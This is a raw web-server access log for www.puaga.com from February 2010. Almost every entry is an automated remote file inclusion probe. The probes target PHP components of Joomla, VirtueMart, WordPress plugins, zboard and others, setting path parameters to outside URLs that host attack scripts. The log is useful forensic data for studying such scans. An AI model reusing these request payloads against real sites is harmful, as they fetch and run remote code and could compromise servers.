211.95.78.56 - - [14/Feb/2010:09:29:05 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:29:06 -0800] "GET /logs/access_100116.log%20%20/?custompluginfile[]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:14 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:15 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:17 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:17 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:19 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:19 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:29:20 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:29:25 -0800] "GET /logs/access_100205.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:29:54 -0800] "GET /logs/access_100125.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:30:08 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:30:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:20 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:27 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:37 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:48 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:49 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:55 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:30:55 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:31:02 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:31:15 -0800] "GET /logs/access_100103.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:31:15 -0800] "GET /logs/access_100117.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:31:15 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:31:15 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:31:25 -0800] "GET /logs/access_100105.log%20%20/?custompluginfile[]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:31:36 -0800] "GET /logs/access_100126.log/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:31:36 -0800] "GET /logs/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:31:41 -0800] "GET /errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:31:42 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:31:43 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:31:43 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.186 - - [14/Feb/2010:09:32:05 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "puaga.com"
125.141.91.138 - - [14/Feb/2010:09:32:21 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:32:24 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:32:27 -0800] "GET ////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:32:27 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:32:27 -0800] "GET /logs/access_100202.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:32:34 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:32:47 -0800] "GET /logs/access_100205.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:32:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:33:21 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:33:21 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:33:21 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [14/Feb/2010:09:33:23 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [14/Feb/2010:09:33:23 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [14/Feb/2010:09:33:23 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:42 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:42 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:46 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:46 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:48 -0800] "GET /e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:48 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:48 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:48 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:33:51 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:34:08 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:14 -0800] "GET /e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:20 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:20 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:23 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:27 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:34:27 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:28 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:28 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:31 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:31 -0800] "GET /e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:32 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:33 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:39 -0800] "GET /logs/access_100128.log%20%20//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:39 -0800] "GET /logs//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:39 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:34:43 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:34:43 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:34:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:34:43 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:45 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:46 -0800] "GET /logs//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:46 -0800] "GET /logs/access_100128.log//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:34:46 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:51 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:34:52 -0800] "GET /logs//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:34:52 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:34:53 -0800] "GET /logs/access_100128.log%20%20//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:34:56 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:35:03 -0800] "GET /logs/access_100128.log//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:35:03 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:35:03 -0800] "GET /logs//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:35:11 -0800] "GET /logs/access_100104.log//modules/vwar/admin/admin.php?vwar_root=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:35:34 -0800] "GET /logs/access_100114.log%20%20//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:35:49 -0800] "GET /logs/access_100114.log%20%20//include.php?language=0&lang_settings[0][1]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:35:52 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:35:52 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:35:52 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:07 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:07 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:22 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:22 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:36:22 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:36:30 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:36:35 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:36:35 -0800] "GET /logs/access_100126.log/errors.php?error=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:36:47 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:36:47 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:36:47 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:36:49 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:01 -0800] "GET /logs/access_100203.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:01 -0800] "GET /logs//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:05 -0800] "GET /PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
